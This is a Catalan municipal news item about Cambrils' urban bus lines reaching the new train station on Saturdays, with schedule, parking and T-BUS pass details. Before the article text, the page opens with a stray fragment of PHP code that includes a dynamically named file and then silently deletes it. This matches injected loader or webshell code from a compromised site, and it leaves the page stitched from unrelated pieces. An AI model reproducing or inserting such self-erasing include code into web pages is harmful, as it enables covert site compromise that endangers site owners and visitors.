");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Les dues línies de bus urbà de Cambrils arribaran fins a la nova estació de tren també els dissabtes
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

Les dues línies de bus urbà de Cambrils arribaran fins a la nova estació de tren també els dissabtes (20/01/2020)

Les dues línies de bus urbà de Cambrils també arribaran fins a la nova estació de tren els dissabtes. Tots els dissabtes un total de 9 expedicions allargaran els seu recorregut per facilitar els desplaçaments de les persones que hagin d’agafar un tren. Els horaris de dissabte es poden consultar en aquest enllaç www.cambrils.cat/aparcam/fitxers/tp/tp-nous-horaris-2020-dissabte.

A més, a petició de les persones usuàries, també s’ha modificat l’horari d’una de les 18 expedicions que des de la setmana passada s’ofereixen de dilluns a divendres per ajustar-la amb el tren que surt de l’estació a les 8:32 hores del matí. Els horaris de dilluns a divendres es poden consultar clicant aquí www.cambrils.cat/aparcam/fitxers/tp/nous-horaris-bus.

Els nous horaris de l’autobús urbà per connectar amb la nova infraestructura són provisionals i oberts a possibles canvis per millorar el servei en funció de les necessitats dels passatgers. L’objectiu és facilitar els desplaçaments amb transport públic ajustant els horaris al màxim per poder cobrir les franges amb més volum de persones usuàries.

D’altra banda, la nova estació de tren compta amb un aparcament per a vehicles privats propietat d’ADIF, obert de les 6:30 a les 23 hores, a més dels terrenys habilitats propers a la nova estació i a la zona esportiva municipal. També disposa d’espai per a taxis, aparca-bicicletes, parada de bus amb marquesina i zones de càrregues i descàrregues de passatgers i de mercaderies.

Les persones empadronades a Cambrils poden soŀlicitar la T-BUS

Totes les persones empadronades al municipi de Cambrils poden soŀlicitar per només 10 euros el títol de transport personal i intransferible T-BUS que permet realitzar viatges iŀlimitats amb les dues línies de transport urbà L1 (centre urbà i urbanitzacions de Llevant), L2 (centre urbà i urbanitzacions de Ponent) i L3 (estació) durant tot l’any 2020.

La targeta es pot soŀlicitar presencialment a l’OAC o online al web www.aparcam.cat.

Font: Ajuntament de Cambrils

Les dues línies de bus urbà de Cambrils arribaran fins a la nova estació de tren també els dissabtes

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona